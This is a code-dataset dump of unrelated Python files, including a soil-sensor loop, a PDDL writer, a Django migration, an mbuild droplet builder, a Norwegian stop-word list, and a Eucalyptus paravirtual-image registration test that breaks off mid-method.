id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
12818018 |
# Main Code Contributions:
# SPDX-FileCopyrightText: 2021 Team 4160 "The Robucs" Mission Bay High School
# SPDX-License-Identifier: MIT
# Some code gratefully reused from:
# SPDX-FileCopyrightText: 2019 ladyada for Adafruit Industries
# SPDX-License-Identifier: MIT
#====================================
import time
import board
import busio
from adafruit_seesaw.seesaw import Seesaw
print("Libraries loaded")
# setup variables for sampling
#====================================
# Sampling configuration.
sleep_timer = 2.0  # seconds between individual moisture readings
deep_sleep = 90    # seconds to wait between averaged reports (and after errors)
retries = 4        # NOTE(review): defined but never used below -- confirm intent
samples = 3        # number of readings averaged per report
# Soil sensor setup: Adafruit Seesaw capacitive sensor on I2C at address 0x36.
i2c = busio.I2C(scl=board.GP1, sda=board.GP0)
ss = Seesaw(i2c, addr=0x36)
# Functions
#====================================
def avg_soil(sleep_timer, samples, read_fn=None):
    """Return the average of `samples` moisture readings, rounded to 1 decimal.

    Readings are spaced `sleep_timer` seconds apart. Fix over the original:
    no wasted sleep after the final reading (the old loop slept once more
    after the last sample, adding a full sleep_timer to every call).

    :param sleep_timer: seconds to wait between consecutive readings
    :param samples: number of readings to average (must be > 0)
    :param read_fn: callable returning one raw moisture value; defaults to
        the module-level Seesaw sensor. Injectable for testing.
    """
    if read_fn is None:
        read_fn = ss.moisture_read
    print("Testing Soil. Takes 6+ seconds (or sleep_timer x samples)")
    total = 0
    for count in range(samples):
        if count:  # sleep only *between* readings, not after the last one
            time.sleep(sleep_timer)
        total += read_fn()
    return round(total / samples, 1)
# Main
#====================================
# Main loop: report the averaged moisture reading forever, deep-sleeping
# between reports. Sensor/parse errors are logged and retried after the same
# deep-sleep interval instead of crashing the board.
while True:
    try:
        print("Moisture:{}".format(avg_soil(sleep_timer, samples)))
    except (ValueError, RuntimeError) as e:
        print("Failed to get data, retrying\n", e)
    time.sleep(deep_sleep)
| StarcoderdataPython |
3541410 | <filename>pddlstream/language/write_pddl.py
import re
import math
from pddlstream.language.constants import AND, OR, OBJECT, TOTAL_COST, TOTAL_TIME, is_cost, get_prefix, \
CONNECTIVES, QUANTIFIERS
from pddlstream.language.conversion import pddl_from_object, is_atom, is_negated_atom, objects_from_evaluations
from pddlstream.language.object import Object, OptimisticObject
from pddlstream.algorithms.downward import fd_from_evaluation
DEFAULT_TYPE = OBJECT # number
def pddl_parameter(param):
    """Render one typed PDDL parameter, e.g. '?x - object'."""
    return '%s - %s' % (param, DEFAULT_TYPE)
def pddl_parameters(parameters):
    """Render a space-separated list of typed PDDL parameters."""
    return ' '.join(pddl_parameter(parameter) for parameter in parameters)
def pddl_head(name, args):
    """Render an atom head '(name arg1 arg2 ...)' with args converted to PDDL."""
    tokens = [name]
    tokens.extend(pddl_from_object(arg) for arg in args)
    return '({})'.format(' '.join(tokens))
def pddl_from_evaluation(evaluation):
    """Render an evaluation as a PDDL :init element.

    Atoms render as '(head ...)', negated atoms as '(not (head ...))', and
    function (fluent) evaluations as '(= (head ...) value)'.
    """
    #if evaluation.head.function == TOTAL_COST:
    #    return None
    head = pddl_head(evaluation.head.function, evaluation.head.args)
    if is_atom(evaluation):
        return head
    elif is_negated_atom(evaluation):
        return '(not {})'.format(head)
    #value = int(evaluation.value)
    value = evaluation.value # floats are fine for temporal planners
    #value = int(math.ceil(evaluation.value))
    return '(= {} {})'.format(head, value)
def pddl_functions(predicates):
    """Render predicate/function declarations, sorted, tab-separated per line."""
    rendered = sorted(predicate.pddl() for predicate in predicates)
    return '\n\t\t'.join(rendered)
def pddl_connective(literals, connective):
    """Combine literal renderings under a logical connective.

    Returns '()' for no literals, the lone literal's pddl() for exactly one,
    and '(<connective> lit1 lit2 ...)' otherwise.
    """
    if not literals:
        return '()'
    if len(literals) == 1:
        return literals[0].pddl()
    parts = [literal.pddl() for literal in literals]
    return '({} {})'.format(connective, ' '.join(parts))
def pddl_conjunction(literals):
    """Render literals joined by AND (degenerate cases handled by pddl_connective)."""
    return pddl_connective(literals, AND)
def pddl_disjunction(literals):
    """Render literals joined by OR (degenerate cases handled by pddl_connective)."""
    return pddl_connective(literals, OR)
def pddl_from_expression(expression):
    """Recursively render a nested goal expression as a PDDL s-expression."""
    if isinstance(expression, (Object, OptimisticObject)):
        return pddl_from_object(expression)
    if isinstance(expression, str):
        return expression
    rendered = map(pddl_from_expression, expression)
    return '({})'.format(' '.join(rendered))
##################################################
def pddl_problem(problem, domain, evaluations, goal_expression, objective=None):
    """Build the PDDL problem text.

    :param problem: problem name
    :param domain: domain name
    :param evaluations: evaluations rendered into the :init section
    :param goal_expression: expression rendered into the :goal section
    :param objective: fluent to minimize (e.g. total-cost / total-time);
        when None, no :metric line is emitted.
    """
    objects = objects_from_evaluations(evaluations)
    s = '(define (problem {})\n' \
        '\t(:domain {})\n' \
        '\t(:objects {})\n' \
        '\t(:init \n\t\t{})\n' \
        '\t(:goal {})'.format(
        problem, domain,
        ' '.join(sorted(map(pddl_from_object, objects))), # map(pddl_parameter,
        '\n\t\t'.join(sorted(filter(lambda p: p is not None,
                                    map(pddl_from_evaluation, evaluations)))),
        pddl_from_expression(goal_expression))
    if objective is not None:
        # BUG FIX: the metric previously always minimized TOTAL_TIME,
        # silently ignoring the caller-supplied objective. Honor it instead.
        s += '\n\t(:metric minimize ({}))'.format(objective)
    return s + ')\n'
def get_problem_pddl(evaluations, goal_exp, domain_pddl):
    """Extract the domain name from domain PDDL text and build matching problem PDDL.

    The problem is named after the domain and minimizes TOTAL_TIME.
    """
    [domain_name] = re.findall(r'\(domain ([^ ]+)\)', domain_pddl)
    problem_name = domain_name
    # BUG FIX: arguments were previously passed as (domain_name, problem_name),
    # i.e. swapped relative to pddl_problem(problem, domain, ...). Harmless
    # today only because problem_name == domain_name.
    problem_pddl = pddl_problem(problem_name, domain_name, evaluations, goal_exp,
                                objective=TOTAL_TIME)
    #write_pddl(domain_pddl, problem_pddl, TEMP_DIR)
    return problem_pddl
204042 | <filename>fechbase.py<gh_stars>1-10
class RecordsBase:
    """Placeholder base class for FEC record types (no shared behavior yet)."""
    pass
class VersionBase:
    """Placeholder base class for a single FEC format version (no behavior yet)."""
    pass
class VersionsBase:
    """Placeholder base class for the collection of FEC format versions."""
    pass
| StarcoderdataPython |
1860179 | <reponame>librazh/financial-analysis<filename>app/index_forecast.py
# -*- coding: utf-8 -*-
"""
TODO: Track and forecast indexes
"""
import matplotlib.pyplot as plt
from .my_logging import get_logger
from .my_tushare import get_tushare
# Module-level singletons: shared logger and configured tushare client.
logger = get_logger()
ts = get_tushare()
def demo(index_code):
    """Plot daily volume and close price for an index over a fixed demo window.

    Draws volume (red, left axis) and close (blue, right axis) on a shared
    date axis, then blocks in plt.show().

    :param index_code: exchange index code accepted by tushare get_k_data
    """
    # Fixed demo date range; index=True requests index (not stock) data.
    df = ts.get_k_data(index_code, index=True, start='2018-08-01', end='2018-08-16')
    fig, ax1 = plt.subplots()
    color = 'tab:red'
    ax1.set_xlabel('date')
    ax1.set_ylabel('volume', color=color)
    ax1.plot(df['date'], df['volume'], color=color)
    ax1.tick_params(axis='y', labelcolor=color)
    # Second y-axis sharing the same x-axis, for the close price.
    ax2 = ax1.twinx()
    color = 'tab:blue'
    ax2.set_ylabel('close', color=color)
    ax2.plot(df['date'], df['close'], color=color)
    ax2.tick_params(axis='y', labelcolor=color)
    fig.tight_layout()
    # plt.plot(df['date'], df['volume'], 'b-', df['date'], df['close'], 'r--')
    # plt.ylabel('index')
    # plt.xlabel('date')
    plt.show()
if __name__ == '__main__':
    # Demo run with a fixed index code.
    demo('399006')
| StarcoderdataPython |
1623954 | # !/usr/bin/env python
# encoding:UTF-8
from django.shortcuts import render
# from dynamic_preferences.models import global_preferences
# from dynamic_preferences.registries import autodiscover
# autodiscover(True)
def home(request):
    """Render the site home page with an empty template context."""
    context = {}
    return render(request, 'home.html', context)
| StarcoderdataPython |
3546553 | ''' Python question by HackerRank
TODO 1: "Exceptions"
You have to pass all the testcases to get a positive score.
'''
import re
# TODO 1: "Exceptions"
def exceptions_example():
    """Read T lines of 'a b' from stdin and print a//b for each.

    Parse/unpack failures and division by zero print 'Error Code:' with the
    exception message instead of aborting the remaining test cases.
    """
    number_of_tests = int(input().strip())
    for _ in range(number_of_tests):
        try:
            a, b = [int(token) for token in input().strip().split()]
        except ValueError as e:
            print("Error Code:", e)
            continue
        try:
            print(a // b)
        except ZeroDivisionError as e:
            print("Error Code:", e)
# TODO 2: "Incorrect Regex"
def incorrect_regex():
    """Read T regex patterns from stdin; print 'True' if valid, else 'False'.

    BUG FIX: the original validated patterns by running re.findall against a
    dummy string and joining the matches. For any *valid* pattern containing
    two or more capture groups, findall returns tuples, ''.join raises
    TypeError, and the pattern was wrongly reported as 'False'. Compiling
    the pattern and catching re.error is the direct, correct validity check.
    """
    number_of_tests = int(input().strip())
    for _ in range(number_of_tests):
        pattern = input().strip()
        try:
            re.compile(pattern)
        except re.error:
            print('False')
        else:
            print('True')
if __name__ == '__main__':
    # NOTE(review): exceptions_example() is defined above but never invoked here.
    incorrect_regex()
| StarcoderdataPython |
1865402 | # Generated by Django 3.0 on 2021-03-08 14:57
from django.db import migrations, models
class Migration(migrations.Migration):
    """Drop priority's auto 'id' column and promote its bounded 'year' field
    (choices 0-4) to be the primary key."""

    dependencies = [
        ('alldata', '0026_quizquestion_friend'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='priority',
            name='id',
        ),
        migrations.AlterField(
            model_name='priority',
            name='year',
            field=models.IntegerField(choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4)], primary_key=True, serialize=False),
        ),
    ]
| StarcoderdataPython |
6656602 | import mbuild
import numpy as np
def get_height(r, theta):
    """Return the height of a spherical cap with sphere radius ``r`` (nm)
    and contact angle ``theta`` (degrees): h = r - r*cos(theta)."""
    cos_theta = np.cos(theta * np.pi / 180)
    return r - r * cos_theta
class Droplet(mbuild.Compound):
    """
    Builds a droplet on a lattice.

    Parameters
    ----------
    radius : int, default = 2
        radius of the droplet in nm
    angle : float, default = 90.0
        contact angle of the droplet in degrees
    fluid : mbuild.Compound or list of mbuild.Compound
        compounds to fill the droplet with
    density: float or list of float
        target density for the droplet in kg/m^3
    lattice: mbuild.Lattice
        lattice to build droplet on (defaults to graphene when None)
    lattice_compound: mbuild.Compound
        compound to build lattice with
    x : float
        dimension of sheet in x direction in nm (defaults to radius * 4)
    y : float
        dimension of sheet in y direction in nm (defaults to radius * 4)

    NOTE: length of `fluid` must match length of `density`

    Attributes
    ----------
    see mbuild.Compound
    """
    def __init__(self, radius=2, angle=90.0, fluid=None, density=None,
                 lattice=None, lattice_compound=None, x=None, y=None):
        super(Droplet, self).__init__()
        if fluid is None:
            raise ValueError('Fluid droplet compounds must be specified')
        if density is None:
            raise ValueError('Fluid density must be specified (units kg/m^3)')
        # Sheet must be wide enough (>= 4 * radius) to host the droplet and
        # is capped at 100 nm to keep the system tractable.
        if x:
            if x < radius * 4:
                raise ValueError(
                    'Dimension x of sheet must be at least radius * 4')
            elif x > 100:
                raise ValueError(
                    'Dimension x of sheet must be less than 100 nm')
        else:
            x = radius * 4
        if y:
            if y < radius * 4:
                raise ValueError(
                    'Dimension y of sheet must be at least radius * 4')
            elif y > 100:
                raise ValueError(
                    'Dimension y of sheet must be less than 100 nm')
        else:
            y = radius * 4
        # Default to graphene lattice
        if lattice is None:
            if lattice_compound is not None:
                raise ValueError(
                    'If Lattice is None, defaults to a Graphene surface. ' +
                    'In this case, do not specify lattice_compound.'
                )
            lattice_compound = mbuild.Compound(name='C')
            lattice_spacing = [0.2456, 0.2456, 0.335]
            angles = [90.0, 90.0, 120.0]
            # Two-atom graphene basis within the unit cell.
            carbon_locations = [[0, 0, 0], [2 / 3, 1 / 3, 0]]
            basis = {lattice_compound.name: carbon_locations}
            lattice = mbuild.Lattice(
                lattice_spacing=lattice_spacing,
                angles=angles,
                lattice_points=basis)
            compound_dict = {lattice_compound.name: lattice_compound}
            factor = np.cos(np.pi / 6)  # fixes non-cubic lattice
            # Estimate the number of lattice repeat units
            replicate = [int(x / 0.2456), int(y / 0.2456) * (1 / factor)]
            lat = lattice.populate(
                compound_dict=compound_dict,
                x=replicate[0],
                y=replicate[1],
                z=3
            )
            # Wrap particles with negative x back into the periodic box.
            for particle in lat.particles():
                if particle.xyz[0][0] < 0:
                    particle.xyz[0][0] += lat.periodicity[0]
            lat.periodicity[1] *= factor
        else:
            if lattice_compound is None:
                raise ValueError('Lattice compounds must be specified')
            if not np.all(lattice.angles == 90.0):
                raise ValueError(
                    'Currently, only cubic lattices are supported. ' +
                    'If using Graphene, do not pass in a Lattice.'
                )
            compound_dict = {lattice_compound.name: lattice_compound}
            lat = lattice.populate(
                compound_dict=compound_dict,
                x=int(x/lattice.lattice_spacing[0]),
                y=int(y/lattice.lattice_spacing[1]),
                z=int(1.5/lattice.lattice_spacing[2]))
        sheet = mbuild.clone(lat)
        self.surface_height = np.max(sheet.xyz, axis=0)[2]
        coords = list(sheet.periodicity)
        # Fill a full sphere centered over the sheet, then carve the droplet
        # (spherical cap with the requested contact angle) out of it.
        height = get_height(radius, angle)
        sphere_coords = [coords[0] / 2, coords[1] / 2, radius, radius]
        sphere = mbuild.fill_sphere(
            compound=fluid, sphere=sphere_coords, density=density)
        # Remove molecules below the cap's cut plane.
        to_remove = []
        for child in sphere.children:
            for atom_coords in child.xyz:
                if height > radius:
                    if atom_coords[2] < height - radius:
                        # NOTE(review): '+=' extends the list by iterating the
                        # child compound -- confirm to_remove.append(child)
                        # was not intended here.
                        to_remove += child
                        break
                else:
                    if atom_coords[2] < height:
                        to_remove += child
                        break
        sphere.remove(to_remove)
        sheet.name = 'LAT'
        sphere.name = 'FLD'
        # Re-seat the droplet so it sits 0.3 nm above the surface.
        sphere.xyz -= [0, 0, np.min(sphere.xyz, axis=0)[2]]
        sphere.xyz += [0, 0, self.surface_height + 0.3]
        self.add(sheet)
        self.add(sphere)
        self.periodicity[0] = sheet.periodicity[0]
        self.periodicity[1] = sheet.periodicity[1]
        self.periodicity[2] = radius * 5
| StarcoderdataPython |
1967555 | # encoding: utf8
from __future__ import unicode_literals
# Norwegian stop-word list: high-frequency function words plus common
# news-corpus tokens, one whitespace-separated token per entry.
STOP_WORDS = set(
    """
alle allerede alt and andre annen annet at av
bak bare bedre beste blant ble bli blir blitt bris by både
da dag de del dem den denne der dermed det dette disse drept du
eller en enn er et ett etter
fem fikk fire fjor flere folk for fortsatt fotball fra fram frankrike fredag
funnet få får fått før først første
gang gi gikk gjennom gjorde gjort gjør gjøre god godt grunn gå går
ha hadde ham han hans har hele helt henne hennes her hun hva hvor hvordan
hvorfor
i ifølge igjen ikke ingen inn
ja jeg
kamp kampen kan kl klart kom komme kommer kontakt kort kroner kunne kveld
kvinner
la laget land landet langt leder ligger like litt løpet lørdag
man mandag mange mannen mars med meg mellom men mener menn mennesker mens mer
millioner minutter mot msci mye må mål måtte
ned neste noe noen nok norge norsk norske ntb ny nye nå når
og også om onsdag opp opplyser oslo oss over
personer plass poeng politidistrikt politiet president prosent på
regjeringen runde rundt russland
sa saken samme sammen samtidig satt se seg seks selv senere september ser sett
siden sier sin sine siste sitt skal skriver skulle slik som sted stedet stor
store står sverige svært så søndag
ta tatt tid tidligere til tilbake tillegg tirsdag to tok torsdag tre tror
tyskland
under usa ut uten utenfor
vant var ved veldig vi videre viktig vil ville viser vår være vært
å år
ønsker
""".split()
)
| StarcoderdataPython |
6589013 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Software License Agreement (BSD License)
#
# Copyright (c) 2009-2011, Eucalyptus Systems, Inc.
# All rights reserved.
#
# Redistribution and use of this software in source and binary forms, with or
# without modification, are permitted provided that the following conditions
# are met:
#
# Redistributions of source code must retain the above
# copyright notice, this list of conditions and the
# following disclaimer.
#
# Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the
# following disclaimer in the documentation and/or other
# materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
from eutester.eutestcase import EutesterTestCase
from testcases.cloud_user.images.imageutils import ImageUtils
from eucaops import Eucaops
from eutester import Eutester
from eucaops.ec2ops import ResourceNotFoundException
import os
import time
class Load_Pv_Image(EutesterTestCase):
    """Eutester test case (Python 2) that bundles, uploads, and registers a
    paravirtual image set (EKI kernel + ERI ramdisk + EMI disk image) from
    remote URLs or files already present on a worker machine, then verifies
    the resulting EMI by launching an instance from it."""

    def __init__(self, tester=None, **kwargs):
        # Images found or created by the do_* test methods below.
        self.emi = None
        self.eki = None
        self.eri = None
        self.setuptestcase()
        self.setup_parser(testname='load_pv_image.py',
                          description='Loads an paravirtual image from a set of '
                                      'Kernel, Ramdisk, and image by remote URLs or filepaths',
                          emi=False,
                          testlist=False)
        self.parser.add_argument('--kernel_image_url',
                                 help='URL containing the kernel image to be downloaded to the'
                                      ' worker machine and used in the pv image',
                                 default=None)
        self.parser.add_argument('--kernelfilepath',
                                 help='An existing file path on the worker machine containing '
                                      'the kernel disk image to use', default=None)
        self.parser.add_argument('--ramdisk_image_url',
                                 help='URL containing the initrd image to be downloaded to the'
                                      ' worker machine and used in the pv image',
                                 default=None)
        self.parser.add_argument('--ramdiskfilepath',
                                 help='An existing file path on the worker machine containing '
                                      'the ramdisk image to use', default=None)
        self.parser.add_argument('--disk_image_url',
                                 help='URL containing the image to be downloaded to the worker'
                                      ' machine and used for the pv disk image',
                                 default=None)
        self.parser.add_argument('--diskfilepath',
                                 help='An existing file path on the worker machine containing '
                                      'the image to use', default=None)
        self.parser.add_argument('--workerip', dest='worker_machine',
                                 help='The ip/hostname of the machine that the operation will '
                                      'be performed on', default=None)
        self.parser.add_argument('--worker_username', dest='worker_username',
                                 help='The username of the machine that the operation will be '
                                      'performed on, default:"root"', default='root')
        self.parser.add_argument('--worker_password', dest='worker_password',
                                 help='The password of the machine that the operation will be '
                                      'performed on', default=None)
        self.parser.add_argument('--worker_keypath', dest='worker_keypath',
                                 help='The ssh keypath of the machine that the operation '
                                      'will be performed on', default=None)
        self.parser.add_argument('--destpath',
                                 help='The path on the workip, that this operation will be '
                                      'performed on', default='/disk1/storage')
        self.parser.add_argument('--urlpass', dest='wget_password',
                                 help='Password needed to retrieve remote url', default=None)
        self.parser.add_argument('--urluser', dest='wget_user',
                                 help='Username needed to retrieve remote url', default=None)
        self.parser.add_argument('--interbundletime', dest='inter_bundle_timeout',
                                 help='Inter-bundle timeout', default=120)
        self.parser.add_argument('--bucket', dest='bucketname', help='bucketname', default=None)
        self.parser.add_argument('--overwrite',
                                 help='Will overwrite files in matching work dir on worker'
                                      ' machine if found', action='store_true', default=False)
        self.parser.add_argument('--no_existing_images', action='store_true', default=False,
                                 help='If set this will not use existing images found on the system'
                                      'sharing the same image name(s) for kernel(eki) '
                                      'and ramdisk(eri) images when building the final image(EMI)')
        self.parser.add_argument('--time_per_gig',
                                 help='Time allowed per image size in GB before timing out. '
                                      'Default:300 seconds', default=300)
        self.parser.add_argument('--remove_created_images',
                                 help='Flag if set will attempt to deregister'
                                      'images this test created, default:False',
                                 action='store_true', default=False)
        self.get_args()
        # Exactly one of URL or local file path must be supplied per image part.
        if (not self.args.disk_image_url and not self.args.diskfilepath) or \
                (self.args.disk_image_url and self.args.diskfilepath):
            raise ValueError('Must provide "either" a url (image_url) to a disk image or the '
                             'file path to an existing image on the worker '
                             'machine (imagefilepath)')
        if (not self.args.kernel_image_url and not self.args.kernelfilepath) or \
                (self.args.kernel_image_url and self.args.kernelfilepath):
            raise ValueError('Must provide "either" a url (kernel_image_url) to a kernel '
                             'image or the file path to an existing image on the worker '
                             'machine (kernelfilepath)')
        if (not self.args.ramdisk_image_url and not self.args.ramdiskfilepath) or \
                (self.args.ramdisk_image_url and self.args.ramdiskfilepath):
            raise ValueError('Must provide "either" a url (ramdisk_image_url) to a '
                             'ramdisk image or the file path to an existing image on the worker '
                             'machine (ramdiskfilepath)')
        # Fall back to the general credentials when worker-specific ones are absent.
        self.args.worker_password = self.args.worker_password or self.args.password
        self.args.worker_keypath = self.args.worker_keypath or self.args.keypair
        self.args.virtualization_type = 'paravirtual'
        if tester is None:
            self.tester = Eucaops(config_file=self.args.config_file, password=self.args.password)
        else:
            self.tester = tester
        Eutester._EUTESTER_FORCE_ANSI_ESCAPE = self.args.use_color
        self.args.tester = self.tester
        # Allow __init__ to get args from __init__'s kwargs or through command line parser...
        for kw in kwargs:
            print 'Setting kwarg:'+str(kw)+" to "+str(kwargs[kw])
            self.set_arg(kw, kwargs[kw])
        self.show_args()
        #self.args.platform = 'Linux'
        #Create an ImageUtils helper from the arguments provided in this self...
        self.image_utils = self.do_with_args(ImageUtils)

    def do_kernel_image(self):
        """
        Description:
        Registers a kernel image with the cloud for use in creating an EMI.
        Attempts to either use an existing file path or download from a URL (whichever has been
        provided by the user) to a 'worker machine'. The worker machine will default to the CLC if
        another host is not provided.
        The image is bundled, uploaded and registered using euca2ools on the worker machine.
        """
        size = None
        image_utils = self.image_utils
        kernelfilepath = self.args.kernelfilepath
        kernel_image_url = self.args.kernel_image_url
        filename = os.path.basename(kernelfilepath or kernel_image_url)
        imagename = filename[0:20] + '_by_eutester'
        # Reuse an existing EKI of this name unless --no_existing_images was given.
        try:
            image = self.tester.get_emi(emi='ki', filters={'name': imagename})
        except ResourceNotFoundException:
            image = None
        if image:
            if self.args.no_existing_images:
                # Find an unused name by appending an increasing numeric suffix.
                x = 0
                while True:
                    try:
                        x += 1
                        newname = "{0}_{1}".format(imagename, x)
                        self.tester.get_emi(emi='ki', filters={'name': newname})
                    except ResourceNotFoundException:
                        imagename = newname
                        break
            else:
                self.status('Found existing EKI image:"{0}" with name: "{1}"'
                            .format(image.id, image.name))
                self.eki = image
                self.tester.show_image(self.eki, verbose=True)
                return self.eki
        if not kernelfilepath:
            destpath = self.args.destpath
            size, kernelfilepath = image_utils.wget_image(url=kernel_image_url,
                                                          destpath=destpath)
        manifest = image_utils.euca2ools_bundle_image(path=kernelfilepath,
                                                      destination=self.args.destpath)
        upmanifest = image_utils.euca2ools_upload_bundle(manifest=manifest,
                                                         bucketname=imagename + '_eutester_pv')
        eki = image_utils.euca2ools_register(manifest=upmanifest, name=imagename)
        # Make sure this image can be retrieved from the system...
        image = self.tester.get_emi(eki, state=None)
        assert image.id == eki, 'Image retrieved from system did not match the test image id. ' \
                                'Fix the test?'
        # Add some tags to inform the cloud admin/users where this image came from...
        image.add_tag(key='Created by eutester load_pv_image test')
        if size is not None:
            image.add_tag(key='size', value=str(size))
        if kernel_image_url:
            image.add_tag(key='source', value=kernel_image_url)
        image.update()
        self.eki = image
        self.tester.show_image(self.eki, verbose=True)
        return self.eki

    def do_ramdisk_image(self):
        """
        Description:
        Registers a ramdisk image with the cloud for use in creating an EMI.
        Attempts to either use an existing file path or download from a URL (whichever has been
        provided by the user) to a 'worker machine'. The worker machine will default to the CLC if
        another host is not provided.
        The image is bundled, uploaded and registered using euca2ools on the worker machine.
        """
        size = None
        image_utils = self.image_utils
        ramdisk_image_url = self.args.ramdisk_image_url
        ramdiskfilepath = self.args.ramdiskfilepath
        filename = os.path.basename(ramdiskfilepath or ramdisk_image_url)
        imagename = filename[0:20] + '_by_eutester'
        # Reuse an existing ERI of this name unless --no_existing_images was given.
        try:
            image = self.tester.get_emi(emi='ri', filters={'name': imagename})
        except ResourceNotFoundException:
            image = None
        if image:
            if self.args.no_existing_images:
                # Find an unused name by appending an increasing numeric suffix.
                x = 0
                while True:
                    try:
                        x += 1
                        newname = "{0}_{1}".format(imagename, x)
                        self.tester.get_emi(emi='ri', filters={'name': newname})
                    except ResourceNotFoundException:
                        imagename = newname
                        break
            else:
                self.status('Found existing ERI image:"{0}" with name: "{1}"'
                            .format(image.id, image.name))
                self.eri = image
                self.tester.show_image(self.eri, verbose=True)
                return self.eri
        if not ramdiskfilepath:
            destpath = self.args.destpath
            size, ramdiskfilepath = image_utils.wget_image(url=ramdisk_image_url,
                                                           destpath=destpath)
        manifest = image_utils.euca2ools_bundle_image(path=ramdiskfilepath,
                                                      destination=self.args.destpath)
        upmanifest = image_utils.euca2ools_upload_bundle(manifest=manifest,
                                                         bucketname=imagename + '_eutester_pv')
        eri = image_utils.euca2ools_register(manifest=upmanifest, name=imagename)
        # Make sure this image can be retrieved from the system...
        image = self.tester.get_emi(eri, state=None)
        assert image.id == eri, 'Image retrieved from system did not match the test image id. ' \
                                'Fix the test?'
        # Add some tags to inform the cloud admin/users where this image came from...
        image.add_tag(key='Created by eutester load_pv_image test')
        if size is not None:
            image.add_tag(key='size', value=str(size))
        if ramdisk_image_url:
            image.add_tag(key='source', value=ramdisk_image_url)
        image.update()
        self.eri = image
        self.tester.show_image(self.eri, verbose=True)
        return self.eri

    def do_image(self):
        """
        Description:
        Registers an image with the cloud using the ERI, and EKI found or created by this test.
        Attempts to either use an existing file path or download from a URL (whichever has been
        provided by the user) to a 'worker machine'. The worker machine will default to the CLC if
        another host is not provided.
        The image is bundled, uploaded and registered using euca2ools on the worker machine.
        """
        size = None
        image_utils = self.image_utils
        diskfilepath = self.args.diskfilepath
        disk_image_url = self.args.disk_image_url
        filename = os.path.basename(diskfilepath or disk_image_url)
        imagename = filename[0:20] + '_by_eutester'
        if not diskfilepath:
            destpath = self.args.destpath
            size, diskfilepath = image_utils.wget_image(url=disk_image_url,
                                                        destpath=destpath)
        try:
            self.tester.get_emi(emi='', filters={'name': imagename}, state=None)
        except ResourceNotFoundException:
            pass
        else:
            # imagename is already taken.
            # Always create a new EMI, so make sure we increment the image name...
            x = 0
            while True:
                try:
                    x += 1
                    newname = "{0}_{1}".format(imagename, x)
                    self.tester.get_emi(emi='', filters={'name': newname})
                    self.debug('image name:"{0}" is already in use...'.format(newname))
                except ResourceNotFoundException:
                    imagename = newname
                    self.debug('Found an unused image name. Using name:"{0}"'.format(imagename))
                    break
        manifest = image_utils.euca2ools_bundle_image(path=diskfilepath,
                                                      destination=self.args.destpath)
        upmanifest = image_utils.euca2ools_upload_bundle(manifest=manifest,
                                                         bucketname=imagename + '_eutester_pv')
        # Register against the kernel/ramdisk created earlier in the test run.
        emi = image_utils.euca2ools_register(manifest=upmanifest,
                                             name=imagename,
                                             kernel=self.eki.id,
                                             ramdisk=self.eri.id,
                                             description='"created by eutester '
                                                         'load_pv_image test"',
                                             virtualization_type='paravirtual',
                                             arch='x86_64'
                                             )
        # Make sure this image can be retrieved from the system...
        image = self.tester.get_emi(emi, state=None)
        assert image.id == emi, 'Image retrieved from system did not match the test image id. ' \
                                'Fix the test?'
        # Add some tags to inform the cloud admin/users where this image came from...
        image.add_tag(key='eutester-created', value='Created by eutester load_pv_image test')
        if size is not None:
            image.add_tag(key='size', value=str(size))
        if disk_image_url:
            image.add_tag(key='source', value=disk_image_url)
        image.update()
        self.emi = image
        self.tester.show_image(self.emi, verbose=True)
        return self.emi

    def make_image_public(self):
        """
        Description:
        Attempts to set the launch permissions to ALL, making the image public.
        """
        emi = self.tester.get_emi(self.emi, state=None)
        emi.set_launch_permissions(group_names=['all'])
        emi.update()
        self.tester.show_image(emi)

    def show_images(self):
        '''
        Attempts to fetch the EMI, EKI, and ERI created by this test and display them in table
        format to the user.
        '''
        self.debug('\nCreate the following Image(s)...\n')
        images = []
        if self.emi:
            self.emi.update()
            images.append(self.emi)
        if self.eri:
            self.eri.update()
            images.append(self.eri)
        if self.eki:
            self.eki.update()
            images.append(self.eki)
        if not images:
            self.debug('No IMAGES were created?')
        else:
            self.tester.show_images(images=images, verbose=True)
        # NOTE(review): 'not' binds only to self.emi below; the check likely
        # intends 'if not (self.emi and self.eri and self.eki)'. Confirm.
        if not self.emi and self.eri and self.eki:
            self.tester.critical('\nTEST FAILED: Could not find all images (EMI, ERI, EKI)')

    def run_new_pv_image(self):
        """
        Description:
        Attempts to run an instance from the newly created PV image.
        Will attempt to ping/ssh into the instance once running and execute the 'uptime' command.
        """
        self.reservation = None
        ### Add and authorize a group for the instance
        self.group = self.tester.add_group('load_pv_image_test')
        self.tester.authorize_group(self.group, port=22)
        self.tester.authorize_group(self.group, protocol='icmp', port=-1)
        ### Generate a keypair for the instance
        localkeys = self.tester.get_all_current_local_keys()
        if localkeys:
            self.keypair = localkeys[0]
            self.keypair_name = self.keypair.name
        else:
            self.keypair_name = "load_pv_test_keypair" + str(int(time.time()))
            self.keypair = self.tester.add_keypair(self.keypair_name)
        try:
            # Scale the launch timeout with the image size (seconds per GB).
            size = int(self.emi.tags.get('size', 0)) * int(self.args.time_per_gig)
            timeout = size or 300
            instance = self.tester.run_image(image=self.emi, keypair=self.keypair,
                                             group=self.group, timeout=timeout)[0]
            instance.sys('uptime', code=0)
